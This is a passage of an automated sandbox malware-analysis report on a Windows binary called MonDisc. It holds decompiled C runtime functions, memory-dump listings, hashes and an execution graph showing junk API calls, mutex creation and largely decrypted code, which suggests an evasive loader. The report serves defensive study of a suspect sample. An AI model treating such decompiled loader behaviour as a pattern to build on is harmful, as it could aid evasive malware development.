				if (_t21 > 0) goto 0x2c9b5cd0;
				asm("o16 nop [eax+eax]");
				asm("movapd xmm0, xmm2");
				asm("orpd xmm0, [0x61014]");
				goto 0x2c9b5dc0;
				asm("o16 nop [eax+eax]");
				asm("movapd xmm0, xmm2");
				goto 0x2c9b5dc0;
				asm("movsd [esp+0x30], xmm0");
				asm("movsd [esp+0x40], xmm1");
				st0 = __fp0;
				st1 = __fp0;
				_t25 = _v136;
				asm("fclex");
				asm("o16 nop [eax+eax]");
				asm("fprem");
				asm("fnstsw ax");
				if ((__eax & 0x00000400) == 0x400) goto 0x2c9b5d00;
				_v136 = _t25;
				_v120 = _t25;
				asm("movsd xmm0, [esp+0x30]");
				goto 0x2c9b5dc0;
				asm("o16 nop [eax+eax]");
				asm("movsd xmm1, xmm0");
				asm("pand xmm1, [0x60f94]");
				asm("movsd xmm0, [0x60fbc]");
				asm("por xmm0, xmm1");
				goto 0x2c9b5dc0;
				asm("movapd xmm1, xmm0");
				asm("por xmm1, [0x60fb4]");
				asm("dec cx");
				r9d = 1;
				_v152 = 8;
				_v144 = 0x21;
				_v120 = 2;
				_t10 = E00007FF67FF62C9D1074(_t11, 0x16, (__eax & 0x00000400) - 0x400, 0x2ca16cc0, _t27, _t31);
				goto 0x2c9b5dc0;
				asm("o16 nop [eax+eax]");
				asm("movapd xmm1, [0x60f88]");
				goto 0x2c9b5d5c;
				asm("o16 nop [eax+eax]");
				asm("movapd xmm0, xmm1");
				asm("o16 nop [eax+eax]");
				asm("movdqa xmm7, [esp+0x60]");
				asm("movdqa xmm6, [esp+0x50]");
				return _t10;
			}





















                              0x7ff62c9b5b07
                              0x7ff62c9b5b0d
                              0x7ff62c9b5b13
                              0x7ff62c9b5b1a
                              0x7ff62c9b5b1f
                              0x7ff62c9b5b24
                              0x7ff62c9b5b2b
                              0x7ff62c9b5b32
                              0x7ff62c9b5b39
                              0x7ff62c9b5b3f
                              0x7ff62c9b5b46
                              0x7ff62c9b5b4c
                              0x7ff62c9b5b56
                              0x7ff62c9b5b5f
                              0x7ff62c9b5b65
                              0x7ff62c9b5b6a
                              0x7ff62c9b5b6f
                              0x7ff62c9b5b73
                              0x7ff62c9b5b77
                              0x7ff62c9b5b7f
                              0x7ff62c9b5b82
                              0x7ff62c9b5b85
                              0x7ff62c9b5b89
                              0x7ff62c9b5b90
                              0x7ff62c9b5b9c
                              0x7ff62c9b5ba2
                              0x7ff62c9b5ba5
                              0x7ff62c9b5ba9
                              0x7ff62c9b5baf
                              0x7ff62c9b5bb3
                              0x7ff62c9b5bb7
                              0x7ff62c9b5bbb
                              0x7ff62c9b5bc8
                              0x7ff62c9b5bd0
                              0x7ff62c9b5bd4
                              0x7ff62c9b5bd8
                              0x7ff62c9b5bdc
                              0x7ff62c9b5be1
                              0x7ff62c9b5be6
                              0x7ff62c9b5bf2
                              0x7ff62c9b5c07
                              0x7ff62c9b5c0e
                              0x7ff62c9b5c14
                              0x7ff62c9b5c1c
                              0x7ff62c9b5c20
                              0x7ff62c9b5c24
                              0x7ff62c9b5c28
                              0x7ff62c9b5c2c
                              0x7ff62c9b5c30
                              0x7ff62c9b5c34
                              0x7ff62c9b5c38
                              0x7ff62c9b5c3c
                              0x7ff62c9b5c40
                              0x7ff62c9b5c44
                              0x7ff62c9b5c48
                              0x7ff62c9b5c4c
                              0x7ff62c9b5c50
                              0x7ff62c9b5c54
                              0x7ff62c9b5c58
                              0x7ff62c9b5c5c
                              0x7ff62c9b5c60
                              0x7ff62c9b5c64
                              0x7ff62c9b5c6c
                              0x7ff62c9b5c70
                              0x7ff62c9b5c74
                              0x7ff62c9b5c78
                              0x7ff62c9b5c7c
                              0x7ff62c9b5c80
                              0x7ff62c9b5c84
                              0x7ff62c9b5c8c
                              0x7ff62c9b5c8e
                              0x7ff62c9b5c92
                              0x7ff62c9b5ca0
                              0x7ff62c9b5ca8
                              0x7ff62c9b5caa
                              0x7ff62c9b5cb0
                              0x7ff62c9b5cb4
                              0x7ff62c9b5cbc
                              0x7ff62c9b5cc1
                              0x7ff62c9b5cd0
                              0x7ff62c9b5cd4
                              0x7ff62c9b5ce0
                              0x7ff62c9b5ce6
                              0x7ff62c9b5cec
                              0x7ff62c9b5cee
                              0x7ff62c9b5cf4
                              0x7ff62c9b5cf8
                              0x7ff62c9b5cfa
                              0x7ff62c9b5d00
                              0x7ff62c9b5d02
                              0x7ff62c9b5d0c
                              0x7ff62c9b5d0e
                              0x7ff62c9b5d12
                              0x7ff62c9b5d16
                              0x7ff62c9b5d1c
                              0x7ff62c9b5d21
                              0x7ff62c9b5d30
                              0x7ff62c9b5d34
                              0x7ff62c9b5d3c
                              0x7ff62c9b5d44
                              0x7ff62c9b5d48
                              0x7ff62c9b5d50
                              0x7ff62c9b5d54
                              0x7ff62c9b5d68
                              0x7ff62c9b5d6d
                              0x7ff62c9b5d73
                              0x7ff62c9b5d7b
                              0x7ff62c9b5d83
                              0x7ff62c9b5d8b
                              0x7ff62c9b5d90
                              0x7ff62c9b5d92
                              0x7ff62c9b5da0
                              0x7ff62c9b5da8
                              0x7ff62c9b5daa
                              0x7ff62c9b5db0
                              0x7ff62c9b5db4
                              0x7ff62c9b5dc0
                              0x7ff62c9b5dc6
                              0x7ff62c9b5dd3

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _handle_error
                              • String ID: !$fmod
                              • API String ID: 1757819995-3213614193
                              • Opcode ID: 9c29c3cbe46a40345482930e7195e83d7d9668eee9cffcf7114d307f60ce050e
                              • Instruction ID: cebe3c65fb240d5b1c7c0a6f3995ee0f354ff43d1eeae1818df11e2eb16e0ec0
                              • Opcode Fuzzy Hash: 9c29c3cbe46a40345482930e7195e83d7d9668eee9cffcf7114d307f60ce050e
                              • Instruction Fuzzy Hash: E3512911D2CF8185EA639B39EC157B96668FFA23D0F409733F90DB15A2DF5DA0038641
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9D1C18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                              Download Yara Rule
                              C-Code - Quality: 44%
                              			E00007FF67FF62C9D1C18(char __ecx, void* __edx, void* __edi, void* __rdx, void* __rsi, void* __r8, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				long long _v48;
				char _v56;
				void* __rbx;
				void* _t31;
				char _t32;
				long long _t47;
				void* _t48;

				_t54 = __rsi;
				_t53 = __rdx;
				asm("movsd [esp+0x20], xmm3");
				asm("movsd [esp+0x18], xmm2");
				_push(_t48);
				_t32 = __ecx;
				r8d = 0;
				if ( *0x2ca1c740 == __edx) goto 0x2c9d1c53;
				r8d = r8d + 1;
				if (0x7ff62ca1c750 - 0x2ca1c910 < 0) goto 0x2c9d1c38;
				goto 0x2c9d1c5e;
				_t47 =  *((intOrPtr*)(0x2ca1c740 + 8 + (r8d + r8d) * 8));
				_v48 = _t47;
				if (_t47 == 0) goto 0x2c9d1cd1;
				_v40 = _a24;
				_v36 = _a28;
				_v32 = _a32;
				_v28 = _a36;
				_v24 = _a40;
				_v20 = _a44;
				_v56 = __ecx;
				E00007FF67FF62C9D0EA0(__ecx, __edi, _t48, _a48, __rdx, __rsi);
				_t52 =  &_v56;
				if (E00007FF67FF62C9BFDE0(0xffc0,  &_v56) != 0) goto 0x2c9d1cc9;
				E00007FF67FF62C9D1BE8(_t32, _t47,  &_v56);
				asm("movsd xmm0, [esp+0x40]");
				goto 0x2c9d1ce6;
				E00007FF67FF62C9D0EA0(_t32, __edi, _t48,  &_v56, _t53, _t54);
				_t31 = E00007FF67FF62C9D1BE8(_t32, _t47, _t52);
				asm("movsd xmm0, [esp+0x80]");
				return _t31;
			}
















                              0x7ff62c9d1c18
                              0x7ff62c9d1c18
                              0x7ff62c9d1c18
                              0x7ff62c9d1c1e
                              0x7ff62c9d1c24
                              0x7ff62c9d1c30
                              0x7ff62c9d1c35
                              0x7ff62c9d1c3a
                              0x7ff62c9d1c3c
                              0x7ff62c9d1c4d
                              0x7ff62c9d1c51
                              0x7ff62c9d1c59
                              0x7ff62c9d1c6b
                              0x7ff62c9d1c73
                              0x7ff62c9d1c79
                              0x7ff62c9d1c81
                              0x7ff62c9d1c89
                              0x7ff62c9d1c91
                              0x7ff62c9d1c9c
                              0x7ff62c9d1ca7
                              0x7ff62c9d1cab
                              0x7ff62c9d1caf
                              0x7ff62c9d1cb4
                              0x7ff62c9d1cc0
                              0x7ff62c9d1cc4
                              0x7ff62c9d1cc9
                              0x7ff62c9d1ccf
                              0x7ff62c9d1cd1
                              0x7ff62c9d1cd8
                              0x7ff62c9d1cdd
                              0x7ff62c9d1ceb

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_errno_from_matherr
                              • String ID: tanh
                              • API String ID: 1187470696-874243715
                              • Opcode ID: 4071e9fc9af7f877fa94fa12e6ee8b539db6f19dc552aa501c08e7e8212eff07
                              • Instruction ID: 22f75391b1fdad1aa6bd86d72f32734317ed1291106597d9759dc7b7b5dcd8ee
                              • Opcode Fuzzy Hash: 4071e9fc9af7f877fa94fa12e6ee8b539db6f19dc552aa501c08e7e8212eff07
                              • Instruction Fuzzy Hash: CB211036E1C6458BEB60DF28A84016A73A0FB8D360F505535F68DE2B5AEF3CD4008F01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9C6F60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E00007FF67FF62C9C6F60(void* __ecx, void* __eflags, void* __rax, long long __rbx, void* __rdx, long long _a8) {
				void* _t3;
				void* _t12;
				void* _t19;

				_t12 = __rax;
				_a8 = __rbx;
				_t3 = E00007FF67FF62C9C670C(6, __rdx, "FlsSetValue", _t19, 0x2ca177f0, 0x2ca177f8);
				if (_t12 == 0) goto 0x2c9c6fa0;
				E00007FF67FF62C9EE410(_t3, _t12);
				goto 0x2c9c6fa6;
				return TlsSetValue(??, ??);
			}






                              0x7ff62c9c6f60
                              0x7ff62c9c6f60
                              0x7ff62c9c6f89
                              0x7ff62c9c6f96
                              0x7ff62c9c6f98
                              0x7ff62c9c6f9e
                              0x7ff62c9c6fb0

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Valuetry_get_function
                              • String ID: FlsSetValue
                              • API String ID: 738293619-3750699315
                              • Opcode ID: eb1b973b29d8f29eeb944f8bd11f3872e7b605d74b20f6105e7a2b599f4eb02e
                              • Instruction ID: 568134f63afb0e8bd1922cecccb65f4aa87208775d5559210909a1e3be2aa5a5
                              • Opcode Fuzzy Hash: eb1b973b29d8f29eeb944f8bd11f3872e7b605d74b20f6105e7a2b599f4eb02e
                              • Instruction Fuzzy Hash: 77E06D61E1868381EF094B54FD404B83222FF48BB0F985432D92D8A39ACE3CEA54C302
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Executed Functions

                              Function 00007FFBB01F1355 Relevance: .0, Instructions: 49COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000012.00000002.526473701.00007FFBB01F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBB01F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_18_2_7ffbb01f0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5921e71f07582a7c74abfbbba3be25ad186edaa7760d03d5a8c8591150ec97b9
                              • Instruction ID: ad16ac0b54fb2eaf27282e7762eb37b6901703d69d8fb8fd50441a6a77a32298
                              • Opcode Fuzzy Hash: 5921e71f07582a7c74abfbbba3be25ad186edaa7760d03d5a8c8591150ec97b9
                              • Instruction Fuzzy Hash: 9B01677111CB0C4FD748EF0CE451AB6B7E0FB95364F10056DE58AC7661DA36E882CB45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:2.7%
                              Dynamic/Decrypted Code Coverage:98.8%
                              Signature Coverage:0%
                              Total number of Nodes:740
                              Total number of Limit Nodes:32
                              execution_graph 57601 7ff62c8f5074 57602 7ff62c8f508b CreateMutexW 57601->57602 57604 7ff62c8f5191 57605 7ff62c8f5171 57604->57605 57606 7ff62c8f520a GetMessageTime 57605->57606 57607 7ff62c8f521c 57606->57607 57608 7ff62c8f52c8 GetUserDefaultLangID 57607->57608 57609 7ff62c8f52d4 57608->57609 57610 7ff62c8f52d6 GetSystemDefaultLangID 57609->57610 57610->57610 57611 7ff62c8f52ed GetParent GetDoubleClickTime GetDoubleClickTime 57610->57611 57612 7ff62c8f5306 57611->57612 57613 7ff62c8f5375 GetWindowTextLengthW GetMessageExtraInfo 57612->57613 57614 7ff62c8f5385 57613->57614 57615 7ff62c8f541a IsIconic IsIconic GetDoubleClickTime GetLastActivePopup GetMessageTime 57614->57615 57616 7ff62c8f544c 57615->57616 57617 7ff62c8f54b0 GetCurrentProcessId 57616->57617 57618 7ff62c8f54b8 GetShellWindow 57617->57618 57618->57618 57619 7ff62c8f54cf GetTopWindow GetMessageExtraInfo 57618->57619 57620 7ff62c8f54e8 57619->57620 57621 7ff62c8f5541 GetParent 57620->57621 57622 7ff62c8f554e 57621->57622 57623 7ff62c8f5603 GetTopWindow 57622->57623 57623->57623 57624 7ff62c8f561c 57623->57624 57625 7ff62c8f75c5 GetLastActivePopup 57624->57625 57626 7ff62c8f75dd 57625->57626 57627 7ff62c8f7657 IsIconic 57626->57627 57628 7ff62c8f7664 57627->57628 57629 7ff62c8f76b7 GetMessageExtraInfo 57628->57629 57630 7ff62c8f76c8 57629->57630 57630->57630 57631 7ff62c8f7805 GetMessageExtraInfo GetCurrentProcessId GetShellWindow 57630->57631 57632 7ff62c8f7834 57631->57632 57633 7ff62c8f796d GetUserDefaultLangID 57632->57633 57634 7ff62c8f7975 57633->57634 57635 7ff62c8f79d5 GetShellWindow AnyPopup GetCommandLineW 57634->57635 57636 7ff62c8f79fd 57635->57636 57637 7ff62c8f7b3d GetMessageTime 57636->57637 57639 7ff62c8f7b48 57637->57639 57638 7ff62c8f7c4e GetSystemDefaultLangID GetMessageExtraInfo GetTickCount 57640 7ff62c8f7c6d GetTickCount 57638->57640 57639->57638 57640->57640 57641 7ff62c8f7c86 GetCurrentProcessId GetTickCount IsIconic 57640->57641 57642 7ff62c8f7c9c 57641->57642 57642->57642 57643 7ff62c8f7cac GetCommandLineW 57642->57643 57644 7ff62c8f7cba GetDesktopWindow 57643->57644 57645 7ff62c8f7cd2 57644->57645 57646 7ff62c8f7ce9 IsZoomed 57645->57646 57647 7ff62c8f7cf9 57646->57647 57648 7ff62c8f7d6e GetLastActivePopup 57647->57648 57649 7ff62c8f7d7b 57648->57649 57649->57649 57650 7ff62c8f7edf GetDoubleClickTime 57649->57650 57652 7ff62c8f7eed 57650->57652 57651 7ff62c8f80a5 IsIconic 57651->57652 57652->57651 57653 7ff62c8f812e 57652->57653 57653->57653 57654 7ff62c8f2c6e 57655 7ff62c8f2e9e 57654->57655 57658 7ff62c8f2ca4 57654->57658 57666 7ff62c8fb470 18 API calls 57655->57666 57657 7ff62c8f2ed0 57659 7ff62c8f3098 57658->57659 57662 7ff62c8f2d98 57658->57662 57664 7ff62c8f2420 57658->57664 57667 7ff62c939540 20 API calls 57659->57667 57661 7ff62c8f5066 57662->57664 57665 7ff62c8fb470 18 API calls 57662->57665 57665->57662 57666->57657 57667->57661 57668 7ff62c8f834d 57669 7ff62c8f82ea 57668->57669 57767 7ff62c906fb0 57669->57767 57673 7ff62c8f844b 57674 7ff62c8f56bc 49 API calls 57673->57674 57675 7ff62c8f845c 57674->57675 57676 7ff62c8f84d5 GetLastActivePopup GetDesktopWindow GetTopWindow GetCurrentProcess 57675->57676 57677 7ff62c8f8502 57676->57677 57677->57677 57678 7ff62c8f852c AnyPopup 57677->57678 57679 7ff62c8f8537 57678->57679 57680 7ff62c8f8742 GetMessageTime GetCurrentProcessId GetTopWindow 57679->57680 57681 7ff62c8f875e 57680->57681 57682 7ff62c8f898b GetModuleHandleW 57681->57682 57683 7ff62c8f8995 57682->57683 57683->57683 57684 7ff62c8f89b7 GetMessageExtraInfo 57683->57684 57685 7ff62c8f89bf 57684->57685 57686 7ff62c8f8a1e GetTopWindow GetCurrentProcessId 57685->57686 57687 7ff62c8f8a31 57686->57687 57688 7ff62c8f8a94 GetTickCount 57687->57688 57688->57688 57689 7ff62c8f8aad GetCurrentProcess 57688->57689 57690 7ff62c8f8ab6 57689->57690 57691 7ff62c8f8c0a GetLastActivePopup 57690->57691 57692 7ff62c8f8c17 57691->57692 57693 7ff62c8f8c9f GetLastActivePopup GetParent 57692->57693 57694 7ff62c8f8cc8 57693->57694 57695 7ff62c8f8d4e GetDesktopWindow GetUserDefaultLangID GetForegroundWindow GetForegroundWindow 57694->57695 57696 7ff62c8f8d77 57695->57696 57697 7ff62c8f8e21 GetLargePageMinimum 57696->57697 57698 7ff62c8f8e34 57697->57698 57699 7ff62c8f8ec0 GetMessageExtraInfo 57698->57699 57700 7ff62c8f8ecb 57699->57700 57701 7ff62c8f8ee0 GetLargePageMinimum 57700->57701 57703 7ff62c8f8f0b 57700->57703 57701->57700 57701->57701 57702 7ff62c8f9010 GetParent IsIconic 57704 7ff62c8f9023 57702->57704 57703->57702 57705 7ff62c8f9065 GetMessageExtraInfo 57704->57705 57706 7ff62c8f906d 57705->57706 57707 7ff62c8f90b6 GetWindowTextLengthW 57706->57707 57708 7ff62c8f90be 57707->57708 57709 7ff62c8f910e GetLastActivePopup 57708->57709 57710 7ff62c8f90ed 57708->57710 57709->57710 57711 7ff62c8f915f AnyPopup 57710->57711 57712 7ff62c8f9167 57711->57712 57713 7ff62c8f91a3 GetWindowTextLengthW GetUserDefaultLangID 57712->57713 57714 7ff62c8f91d5 57713->57714 57716 7ff62c8fce80 18 API calls 57714->57716 57766 7ff62c8fa2cd 57714->57766 57715 7ff62c8fb610 49 API calls 57717 7ff62c8fa5fb 57715->57717 57718 7ff62c8f91ea GetForegroundWindow 57716->57718 57720 7ff62c8f9212 57718->57720 57721 7ff62c8f9242 GetDoubleClickTime 57720->57721 57722 7ff62c8f924d 57721->57722 57723 7ff62c8f92ed GetUserDefaultLangID 57722->57723 57724 7ff62c8f92f8 57723->57724 57725 7ff62c8f93ba GetLargePageMinimum 57724->57725 57726 7ff62c8f93ca 57725->57726 57727 7ff62c8f93ed GetModuleHandleW 57726->57727 57728 7ff62c8f93f7 57727->57728 57728->57728 57729 7ff62c8f941d IsZoomed 57728->57729 57729->57729 57730 7ff62c8f9438 57729->57730 57731 7ff62c8f954f GetWindowTextLengthW 57730->57731 57732 7ff62c8f956a 57731->57732 57733 7ff62c8f9598 GetDesktopWindow GetTopWindow GetCommandLineW GetTopWindow GetMessageTime 57732->57733 57734 7ff62c8f95cb 57733->57734 57735 7ff62c8f95f6 GetSystemDefaultLangID 57734->57735 57737 7ff62c8f9618 57735->57737 57736 7ff62c8f9712 AnyPopup 57736->57737 57737->57736 57738 7ff62c8f980f 57737->57738 57739 7ff62c8f99be GetCurrentProcessId GetUserDefaultLangID GetSystemDefaultLangID 57738->57739 57740 7ff62c8f99f3 57739->57740 57741 7ff62c8f9a7a GetTopWindow 57740->57741 57742 7ff62c8f9a85 GetSystemDefaultLangID 57741->57742 57742->57742 57743 7ff62c8f9a9e 57742->57743 57743->57743 57744 7ff62c8f9c55 GetMessageTime GetMessageExtraInfo IsZoomed 57743->57744 57745 7ff62c8f9c71 57744->57745 57746 7ff62c8f9cbd GetForegroundWindow GetDoubleClickTime GetUserDefaultLangID 57745->57746 57747 7ff62c8f9ce7 57746->57747 57748 7ff62c8f9d3b GetLargePageMinimum 57747->57748 57748->57747 57749 7ff62c8f9d60 GetShellWindow 57748->57749 57750 7ff62c8f9d6b 57749->57750 57751 7ff62c8f9ebf GetCurrentProcessId 57750->57751 57752 7ff62c8f9edd 57751->57752 57753 7ff62c8f9f00 GetCommandLineW GetModuleHandleW 57752->57753 57754 7ff62c8f9f1d 57753->57754 57755 7ff62c8f9f38 GetCommandLineW 57754->57755 57756 7ff62c8f9f43 57755->57756 57757 7ff62c8fdc20 18 API calls 57756->57757 57758 7ff62c8fa050 57757->57758 57759 7ff62c8fe2b0 18 API calls 57758->57759 57760 7ff62c8fa069 57759->57760 57761 7ff62c8fa1c5 GetCommandLineW 57760->57761 57762 7ff62c8fa1d0 57761->57762 57763 7ff62c8fa27a GetCurrentProcessId GetLargePageMinimum GetMessageExtraInfo 57762->57763 57764 7ff62c8fa291 57763->57764 57765 7ff62c8fa2b3 GetWindowTextLengthW 57764->57765 57765->57766 57766->57715 57780 7ff62c8fb7c0 57767->57780 57770 7ff62c9075f0 57773 7ff62c907610 57770->57773 57774 7ff62c907645 57773->57774 58215 7ff62c8fda80 18 API calls 57773->58215 58216 7ff62c8fdd00 18 API calls 57773->58216 58217 7ff62c906b70 18 API calls 57774->58217 57778 7ff62c90765d 57779 7ff62c90769b 57778->57779 58218 7ff62c8fda80 18 API calls 57778->58218 58219 7ff62c8fe2b0 57778->58219 57781 7ff62c8fb7ec 57780->57781 57785 7ff62c8fb80e _fread_nolock 57781->57785 57788 7ff62c8fb96b 57781->57788 57790 7ff62c914990 GetLastError VirtualAlloc SetLastError 57781->57790 57784 7ff62c8f8438 57784->57770 57785->57788 57799 7ff62c8f3037 57785->57799 57787 7ff62c8fb957 57787->57788 57807 7ff62c8fb1c0 GetLastError VirtualQuery VirtualFree SetLastError VirtualFree 57787->57807 57792 7ff62c973de0 57788->57792 57791 7ff62c9149dc _fread_nolock 57790->57791 57791->57785 57795 7ff62c973de9 57792->57795 57793 7ff62c974a24 IsProcessorFeaturePresent 57796 7ff62c974a3c 57793->57796 57794 7ff62c973df4 57794->57784 57795->57793 57795->57794 57808 7ff62c974d28 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57796->57808 57798 7ff62c974a4f 57798->57784 57809 7ff62c911c26 57799->57809 57817 7ff62c911cf0 57799->57817 57822 7ff62c911a20 57799->57822 57826 7ff62c8fb2d0 57799->57826 57831 7ff62c904bf0 57799->57831 57849 7ff62c911aa8 57799->57849 57800 7ff62c8f2420 57800->57787 57807->57788 57808->57798 57810 7ff62c911c32 57809->57810 57814 7ff62c911a50 57810->57814 57876 7ff62c939ca0 57810->57876 57816 7ff62c911aa3 57814->57816 57860 7ff62c910a90 57814->57860 57816->57800 57984 7ff62c952750 57817->57984 57819 7ff62c911d05 57820 7ff62c911d0d 57819->57820 58015 7ff62c911d70 57819->58015 57820->57800 57823 7ff62c911a50 57822->57823 57824 7ff62c910a90 37 API calls 57823->57824 57825 7ff62c911aa3 57823->57825 57824->57823 57825->57800 58066 7ff62c909080 57826->58066 58081 7ff62c913c30 57831->58081 57833 7ff62c904c18 57834 7ff62c904c3f 57833->57834 57839 7ff62c904c8f 57833->57839 57835 7ff62c904c4d 57834->57835 57836 7ff62c904c46 57834->57836 58102 7ff62c9225b0 18 API calls _handle_error 57835->58102 58090 7ff62c91cb60 57836->58090 58104 7ff62c901970 18 API calls _fread_nolock 57839->58104 57840 7ff62c904c4b 58103 7ff62c90c900 18 API calls 57840->58103 57843 7ff62c904ca8 57845 7ff62c901990 18 API calls 57843->57845 57844 7ff62c904c61 57844->57800 57846 7ff62c904cc5 vfwprintf 57845->57846 58105 7ff62c99c09c 19 API calls 3 library calls 57846->58105 57848 7ff62c904d0c 57848->57800 57850 7ff62c9116c0 35 API calls 57849->57850 57851 7ff62c911aba 57850->57851 57852 7ff62c911bfd 57851->57852 57856 7ff62c911a50 57851->57856 58184 7ff62c954220 18 API calls 57851->58184 58139 7ff62c93f2c0 57852->58139 57855 7ff62c910a90 37 API calls 57855->57856 57856->57855 57857 7ff62c911aa3 57856->57857 57857->57800 57858 7ff62c911b32 57858->57852 58185 7ff62c954120 16 API calls _vwscanf_s_l 57858->58185 57896 7ff62c93b310 20 API calls 57860->57896 57862 7ff62c910b43 57862->57814 57863 7ff62c910e18 57865 7ff62c910e89 57863->57865 57866 7ff62c910e4f 57863->57866 57864 7ff62c910ab5 57864->57862 57864->57863 57897 7ff62c954220 18 API calls 57864->57897 57867 7ff62c910e97 57865->57867 57926 7ff62c910280 35 API calls _fread_nolock 57865->57926 57869 7ff62c910e74 57866->57869 57910 7ff62c9116c0 57866->57910 57867->57814 57869->57814 57872 7ff62c910cc7 57872->57863 57898 7ff62c90a4b0 57872->57898 57875 7ff62c910cf6 57909 7ff62c954120 16 API calls _vwscanf_s_l 57875->57909 57877 7ff62c911c7e 57876->57877 57879 7ff62c939cb9 57876->57879 57880 7ff62c939dd0 57877->57880 57952 7ff62c939a10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind _handle_error 57879->57952 57881 7ff62c8f3037 43 API calls 57880->57881 57882 7ff62c939e1e 57881->57882 57886 7ff62c939e7e 57882->57886 57953 7ff62c901990 57882->57953 57884 7ff62c939ebc 57885 7ff62c939ecc 57884->57885 57887 7ff62c93bce8 57884->57887 57888 7ff62c93bcb5 57884->57888 57885->57814 57886->57814 57965 7ff62c90fe90 57887->57965 57964 7ff62c909c30 18 API calls 57888->57964 57891 7ff62c93bcd7 57891->57814 57896->57864 57897->57872 57899 7ff62c90a6ea 57898->57899 57904 7ff62c90a4d9 57898->57904 57900 7ff62c90a6ef 57899->57900 57934 7ff62c901650 18 API calls 57899->57934 57900->57875 57907 7ff62c90a598 57904->57907 57927 7ff62c909d30 57904->57927 57905 7ff62c90a606 _fread_nolock 57906 7ff62c90a6e2 57905->57906 57933 7ff62c90a850 18 API calls _fread_nolock 57905->57933 57907->57875 57909->57863 57911 7ff62c9116d7 57910->57911 